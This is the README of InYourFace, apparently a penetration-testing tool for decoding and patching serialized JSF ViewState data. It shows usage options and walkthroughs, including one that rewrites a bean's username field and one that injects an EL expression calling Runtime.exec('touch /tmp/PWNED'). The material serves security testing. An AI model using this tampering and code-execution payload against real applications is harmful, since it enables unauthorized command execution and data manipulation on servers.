-- Introduction -------------------------------------------------
InYourFace is a tool for patching JSF ViewState.
It is based on the jdeserialize library:
http://code.google.com/p/jdeserialize/
-- Disclaimer --------------------------------------------------
The authors of this tool take no responsibility for the way
you use this tool. You are responsible for your own actions.
-- Compilation -------------------------------------------------
You can easily compile this tool with Ant. However, if you want to
prove that you are a Java Compilation Master Certified, I'll let you
find the suitable "javac" command yourself :]
-- Usage -------------------------------------------------------
$> ./inyourface.sh -h
Usage: inyourface [options] <viewstate_file>
  Options:
    -h, -help
       Display this message
       Default: false
    -outfile
       Patched output file (default: stdout)
    -patch
       Patch class field (<obj_addr> <field_name> <value>)
       Default: []
    -pretty
       Pretty print
       Default: false
    -raw
       Raw output
       Default: false
    -rawpatch
       Patch blockdata (<start_offset> <end_offset> <blockdata_file>)
       Default: []
-- Patch a class field -----------------------------------------
1. detect the field to patch:

$> ./inyourface.sh /tmp/viewstate.txt
[...]
[instance 0x7e002b: 0x7e002a/com.itinpractice.beans.ProfileBean
  s_offset: 921 / e_offset: 1109
  field data:
    0x7e002a/com.itinpractice.beans.ProfileBean:
      password: r0x7e0029: [String 0x7e0029: "testtest"]
      address: r0x7e0025: [String 0x7e0025: "17 rue plop 75001 Paris"]
      username: r0x7e002c: [String 0x7e002c: "rdub"]
      lastname: r0x7e0028: [String 0x7e0028: "dubourguais"]
      firstname: r0x7e0027: [String 0x7e0027: "renaud"]
      userId: 2
      email: r0x7e0026: [String 0x7e0026: "renaud.dubourguais@synacktiv.com"]
]
[...]

2. patch the class field:

$> ./inyourface.sh -outfile /tmp/patched.txt -patch 0x7e002b username "TEST" /tmp/viewstate.txt
[...]
patching instance
field to patch @ from 1102 to 1109 | [String 0x7e002c: "rdub"]
new patch object registered / s_offset=1102 / e_offset=1109 / value=TEST
patching object @ s_offset=1102 / e_offset=1109 / size=7 / value=TEST

3. check the changes:

$> ./inyourface.sh /tmp/patched.txt
[...]
[instance 0x7e002b: 0x7e002a/com.itinpractice.beans.ProfileBean
  s_offset: 921 / e_offset: 1109
  field data:
    0x7e002a/com.itinpractice.beans.ProfileBean:
      password: r0x7e0029: [String 0x7e0029: "testtest"]
      address: r0x7e0025: [String 0x7e0025: "17 rue plop 75001 Paris"]
      username: r0x7e002c: [String 0x7e002c: "TEST"]
      lastname: r0x7e0028: [String 0x7e0028: "dubourguais"]
      firstname: r0x7e0027: [String 0x7e0027: "renaud"]
      userId: 2
      email: r0x7e0026: [String 0x7e0026: "renaud.dubourguais@synacktiv.com"]
]
[...]
-- Patch a blockdata -------------------------------------------
1. detect the blockdata:

$> ./inyourface.sh /tmp/viewstate.txt
[...]
[instance 0x7e000f: 0x7e000e/org.apache.el.ValueExpressionImpl
  s_offset: 387 / e_offset: 468
  object annotations:
    org.apache.el.ValueExpressionImpl
      [blockdata from 441 to 465: 23 bytes]
        raw: \x17\x00\x03\x74\x62\x6c\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74
        from 442 to 445: 3 bytes: tbl
        from 447 to 463: 16 bytes: java.lang.Object
      NULL
      NULL
  field data:
    0x7e000c/javax.el.Expression:
    0x7e000b/javax.el.ValueExpression:
]
[...]

2. patch the blockdata:

$> ./inyourface.sh -outfile /tmp/patched.txt -rawpatch 441 465 /tmp/patch.txt /tmp/viewstate.txt

3. check the patch:

$> ./inyourface.sh /tmp/patched.txt
[...]
[instance 0x7e000f: 0x7e000e/org.apache.el.ValueExpressionImpl
  s_offset: 387 / e_offset: 655
  object annotations:
    org.apache.el.ValueExpressionImpl
      [blockdata from 441 to 652: 210 bytes]
        raw: \xd2\x00\xbe\x23[...]\2e\x4f\x62\x6a\x65\x63\x74
        from 442 to 632: 190 bytes: #{request.getClass().getClassLoader().loadClass('java.lang.Runtime').getDeclaredMethods()[6].invoke(null).exec('touch /tmp/PWNED')}
        from 634 to 650: 16 bytes: java.lang.Object
  field data:
    0x7e000c/javax.el.Expression:
    0x7e000b/javax.el.ValueExpression:
]
[...]
-- JDeserialize vs InYourFace ----------------------------------
Patches are available in the "patches" directory.
They add the features InYourFace requires to a clean
jdeserialize build.
-- Contact -----------------------------------------------------
This tool is provided by Synacktiv with no warranties and delivered
"as is".
For questions, bug reports, ideas and contributions please contact
renaud.dubourguais@synacktiv.com or nicolas.collignon@synacktiv.com.